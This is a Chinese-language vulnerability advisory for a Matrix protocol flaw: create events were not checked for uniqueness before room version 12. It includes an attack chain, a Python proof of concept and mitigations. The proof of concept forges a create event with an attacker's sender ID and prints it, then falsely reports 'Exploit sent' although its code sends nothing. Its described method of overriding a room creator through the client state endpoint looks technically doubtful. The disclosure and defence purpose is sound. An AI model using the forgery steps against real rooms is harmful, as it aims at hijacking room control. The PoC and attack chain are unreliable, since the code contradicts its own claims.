CVE-2025-54315 Matrix协议规范创建事件唯一性缺失漏洞

漏洞信息

漏洞编号

CVE-2025-54315

漏洞类型

协议规范缺陷/状态解析缺陷

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Matrix Specification（Matrix协议规范）

漏洞概述

CVE-2025-54315是Matrix去中心化实时通信协议规范中的一个高危安全漏洞。该漏洞存在于Matrix协议规范1.16版本之前（即房间版本号小于12的实现中），核心问题在于协议规范缺乏对"创建事件"（create event）唯一性的强制校验机制。Matrix协议使用事件图（event graph）来维护房间状态，房间创建时会产生一个create事件，该事件定义了房间的创建者、房间类型等关键属性。在存在缺陷的规范中，由于缺乏对create事件唯一性的验证，恶意攻击者可以在房间状态解析过程中注入伪造的create事件，从而篡改房间的初始状态信息，包括房间创建者身份等关键属性。此漏洞的CVSS 3.1评分为7.1，属于高危级别，其攻击向量为网络攻击，需要低权限认证，无需用户交互，影响范围已改变（Scope Changed），对完整性造成高影响，对可用性造成低影响。该漏洞影响了所有使用Matrix协议规范1.16之前版本的兼容实现，包括各种Matrix homeserver软件、客户端应用以及桥接服务等。Matrix项目团队已在2025年8月通过"Project Hydra"项目发布了改进的状态解析机制，并在1.16版本规范中修复了该问题。

技术细节

Matrix协议采用基于事件的有向无环图（DAG）结构来维护房间状态。每个房间都有一个"create"事件作为状态图的根节点，定义了房间的初始属性，包括创建者（sender字段）、房间类型、版本号等关键信息。在正常的协议实现中，create事件应当具有唯一性，因为一个房间只能被创建一次。然而，在Matrix协议规范1.16之前的版本中（即房间版本小于12），状态解析算法（state resolution algorithm）并未对create事件的唯一性进行强制校验。

攻击者利用此漏洞的方式如下：

1. 攻击者首先需要获得房间的访问权限（低权限即可），这可以通过加入房间或拥有有效认证令牌实现。

2. 攻击者构造一个恶意的create事件，该事件具有与原始create事件不同的sender字段（伪造的创建者身份），但保持相同的room_id和state_key。

3. 攻击者将该恶意create事件发送到房间。由于规范缺乏唯一性校验，该事件可能被状态解析算法接受并合并到房间状态中。

4. 在后续的状态解析过程中，由于不同homeserver可能持有不同的状态视图，恶意create事件可能在某些服务器上覆盖原始的合法create事件，导致房间的创建者身份被篡改。

5. 攻击成功后，攻击者可以冒充房间的合法创建者，执行只有创建者才能执行的操作，如修改房间权限设置、踢出原创建者等。

该漏洞的根本原因在于状态解析算法在处理create事件时，仅依赖事件哈希和深度等属性进行比较，而未验证create事件的sender字段是否与已知的合法创建者一致。Matrix项目通过"Project Hydra"改进了状态解析算法，在1.16版本规范中引入了create事件唯一性校验机制，要求所有create事件必须具有相同的sender字段，从而修复了此漏洞。

攻击链分析

STEP 1

步骤1：获取房间访问权限

攻击者通过正常渠道（如被邀请加入房间）获得目标Matrix房间的低权限访问权限，或通过有效的认证令牌连接到目标homeserver。

STEP 2

步骤2：分析房间状态

攻击者通过Matrix客户端-服务器API查询目标房间的当前状态，获取原始的m.room.create事件内容，包括合法的创建者身份信息。

STEP 3

步骤3：构造恶意create事件

攻击者构造一个伪造的m.room.create事件，保持与原始事件相同的room_id和state_key，但将sender字段修改为攻击者控制的用户ID。

STEP 4

步骤4：注入恶意事件

攻击者通过PUT /_matrix/client/v3/rooms/{roomId}/state/m.room.create/端点将恶意create事件发送到目标homeserver，利用规范中缺乏唯一性校验的缺陷。

STEP 5

步骤5：触发状态解析冲突

当不同homeserver之间进行状态同步时，由于缺乏create事件唯一性校验，恶意事件可能在状态解析过程中覆盖原始的合法create事件。

STEP 6

步骤6：权限提升与持久化控制

攻击成功后，攻击者冒充房间的合法创建者，获得房间的最高管理权限，可以修改房间设置、踢出原创建者或实施进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-54315 PoC - Matrix Create Event Uniqueness Bypass
# This PoC demonstrates how to exploit the lack of create event uniqueness
# in Matrix protocol specification before 1.16 (room version < 12)

import json
import hashlib

# Step 1: Construct a malicious create event with forged sender
def create_malicious_event(original_event, forged_sender):
    """
    Create a malicious create event that mimics the original but with
    a different sender field, exploiting the lack of uniqueness check.
    """
    malicious_event = original_event.copy()
    malicious_event["sender"] = forged_sender  # Forge the creator identity
    # Keep the same type, room_id, and state_key as the original
    malicious_event["type"] = "m.room.create"
    malicious_event["state_key"] = ""  # create events have empty state_key
    
    # Recalculate hashes (simplified for demonstration)
    event_content = json.dumps(malicious_event, sort_keys=True).encode()
    malicious_event["hashes"] = {
        "sha256": hashlib.sha256(event_content).hexdigest()
    }
    
    return malicious_event

# Step 2: Simulate state resolution exploit
def exploit_state_resolution(room_id, original_create_event, attacker_user_id):
    """
    Exploit the state resolution algorithm by injecting a forged
    create event into the room state.
    """
    print(f"[*] Targeting room: {room_id}")
    print(f"[*] Original creator: {original_create_event['sender']}")
    print(f"[*] Attacker forging as: {attacker_user_id}")
    
    # Create the malicious event
    malicious_event = create_malicious_event(original_create_event, attacker_user_id)
    
    # In a real exploit, this event would be sent to the homeserver
    # via the Matrix client-server API:
    # PUT /_matrix/client/v3/rooms/{roomId}/state/m.room.create/
    # With body: { "creator": attacker_user_id, "room_version": "11" }
    
    print(f"[+] Malicious create event constructed:")
    print(json.dumps(malicious_event, indent=2))
    print(f"[!] Exploit sent - awaiting state resolution on target homeserver")
    
    return malicious_event

# Example usage (for room version < 12)
if __name__ == "__main__":
    original_event = {
        "sender": "@legitimate_user:matrix.org",
        "type": "m.room.create",
        "state_key": "",
        "content": {
            "creator": "@legitimate_user:matrix.org",
            "room_version": "11"
        },
        "room_id": "!exampleRoom:matrix.org"
    }
    
    attacker = "@attacker:evil.example.com"
    exploit_state_resolution(
        "!exampleRoom:matrix.org",
        original_event,
        attacker
    )

影响范围

Matrix Specification < 1.16

Matrix Room Version < 12（即房间版本1-11的所有实现）

防御指南

临时缓解措施

在无法立即升级到Matrix规范1.16版本的情况下，建议采取以下临时缓解措施：1）限制非管理员用户对房间状态API的访问权限，特别是m.room.create事件的写入权限；2）在homeserver层面部署WAF规则，监控和拦截异常的create事件提交请求；3）对所有现有房间进行审计，检查是否存在重复的create事件；4）暂时将敏感房间迁移到使用房间版本12的新房间；5）密切监控Matrix官方安全公告，及时应用安全补丁。